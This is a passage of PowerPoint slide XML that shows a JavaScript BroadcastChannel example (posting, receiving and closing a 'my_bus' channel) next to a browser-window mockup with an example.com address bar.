            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D81B60"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>my_bus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D81B60"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>".</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="37474F"/>
              </a:solidFill>
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1913"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3B78E7"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="37474F"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> channel = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3B78E7"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="37474F"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9C27B0"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>BroadcastChannel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="37474F"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D904F"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D904F"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>my_bus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D904F"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="37474F"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1913"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="37474F"/>
              </a:solidFill>
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1913"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D81B60"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>// Send a message on "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D81B60"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>my_bus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D81B60"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>".</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="37474F"/>
              </a:solidFill>
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1913"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="37474F"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>channel.postMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="37474F"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D904F"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>'This is a test message.'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="37474F"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1913"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="37474F"/>
              </a:solidFill>
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1913"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D81B60"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>// Listen for messages on "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D81B60"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>my_bus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D81B60"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>".</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="37474F"/>
              </a:solidFill>
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1913"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="37474F"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>channel.onmessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="37474F"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3B78E7"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="37474F"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(e) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1913"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="37474F"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="37474F"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>console.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="37474F"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D904F"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>'Received'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="37474F"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="37474F"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>e.data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="37474F"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1913"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="37474F"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1913"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="37474F"/>
              </a:solidFill>
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1913"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D81B60"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>// Close the channel when you're done.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="37474F"/>
              </a:solidFill>
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1913"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="37474F"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>channel.close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="37474F"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3922748742"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition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">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39EE168B-51B2-8B40-AD80-F9E329A67C95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3132139" y="2244725"/>
            <a:ext cx="5927725" cy="3168650"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="15805531" cy="8452748"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="8" name="Group">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{197537B6-276F-3D4A-9415-785856ED082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0"/>
              <a:ext cx="15805532" cy="8452749"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="15805531" cy="8452748"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17" name="Rounded Rectangle">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0106946-7CEE-A64A-B325-1A4D2F16BB85}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="15805531" cy="8452748"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 4020"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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>
                <a:outerShdw blurRad="50800" dist="25400" dir="3600000" rotWithShape="0">
                  <a:srgbClr val="000000">
                    <a:alpha val="70000"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </p:spPr>
            <p:txBody>
              <a:bodyPr lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="219075">
                  <a:defRPr sz="4000" b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24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ea typeface="Gill Sans"/>
                  <a:cs typeface="Gill Sans"/>
                  <a:sym typeface="Gill Sans"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="18" name="Shape">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{549021DF-595F-5544-AFF3-715A74A884CF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="67726" y="38115"/>
                <a:ext cx="15670079" cy="178286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0" y="4117"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2980"/>
                      <a:pt x="52" y="1951"/>
                      <a:pt x="136" y="1206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="220" y="461"/>
                      <a:pt x="336" y="0"/>
                      <a:pt x="464" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="21136" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21264" y="0"/>
                      <a:pt x="21380" y="461"/>
                      <a:pt x="21464" y="1206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21548" y="1951"/>
                      <a:pt x="21600" y="2980"/>
                      <a:pt x="21600" y="4117"/>
                    </a:cubicBez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DCDEE0"/>
              </a:solidFill>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="219075">
                  <a:defRPr sz="3900" b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24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ea typeface="Gill Sans"/>
                  <a:cs typeface="Gill Sans"/>
                  <a:sym typeface="Gill Sans"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="Group">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{429C2690-B440-314F-BA59-D0EAD12AD15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7797" y="770587"/>
              <a:ext cx="1446117" cy="281529"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="1446116" cy="281528"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="Oval">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75B6E6D5-849D-BE40-99D9-D1F73F4587C5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1159158" y="155"/>
                <a:ext cx="287835" cy="279498"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="00882B"/>
              </a:solidFill>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="219075">
                  <a:defRPr sz="4000" b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24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ea typeface="Gill Sans"/>
                  <a:cs typeface="Gill Sans"/>
                  <a:sym typeface="Gill Sans"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="15" name="Oval">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02480AC9-1B80-D14B-A4AD-1F461804C5F2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="579254" y="155"/>
                <a:ext cx="287835" cy="279498"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="F5D328"/>
              </a:solidFill>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="219075">
                  <a:defRPr sz="4000" b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24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ea typeface="Gill Sans"/>
                  <a:cs typeface="Gill Sans"/>
                  <a:sym typeface="Gill Sans"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16" name="Oval">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4896D9E-2B94-0F48-A321-01D1012DB8D1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="-648" y="155"/>
                <a:ext cx="287835" cy="279498"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="C82506"/>
              </a:solidFill>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="219075">
                  <a:defRPr sz="4000" b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24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ea typeface="Gill Sans"/>
                  <a:cs typeface="Gill Sans"/>
                  <a:sym typeface="Gill Sans"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="10" name="Group">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B28899BE-D096-0D4C-A113-C276114F054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368043" y="218002"/>
              <a:ext cx="12651290" cy="1350113"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="12651289" cy="1350111"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Rectangle">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAB79D93-2F2A-7B44-A133-08218C7CA299}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="-1872" y="252065"/>
                <a:ext cx="12652044" cy="876610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lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="219075">
                  <a:defRPr sz="4000" b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24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ea typeface="Gill Sans"/>
                  <a:cs typeface="Gill Sans"/>
                  <a:sym typeface="Gill Sans"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="12" name="Image" descr="Image">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{118F7C19-DCA6-1D41-BD4D-78BBDFB89FB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861276" y="408056"/>
                <a:ext cx="649043" cy="5705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400000"/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a14:hiddenLine>
                </a:ext>
              </a:extLst>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="http://example.com">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1FC5F27-18D6-0640-BC2A-BF3A0C4DC2F8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="226703" y="-2025"/>
                <a:ext cx="10899636" cy="135091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lIns="19050" tIns="19050" rIns="19050" bIns="19050" anchor="ctr"/>
              <a:lstStyle>
                <a:lvl1pPr algn="l" defTabSz="584200">
                  <a:defRPr sz="1000" b="0">
                    <a:solidFill>
                      <a:srgbClr val="A6AAA9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>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr sz="2400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>http://</a:t>
                </a:r>
                <a:r>
                  <a:rPr sz="2400" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>example.com</a:t>
                </a:r>
                <a:endParaRPr sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
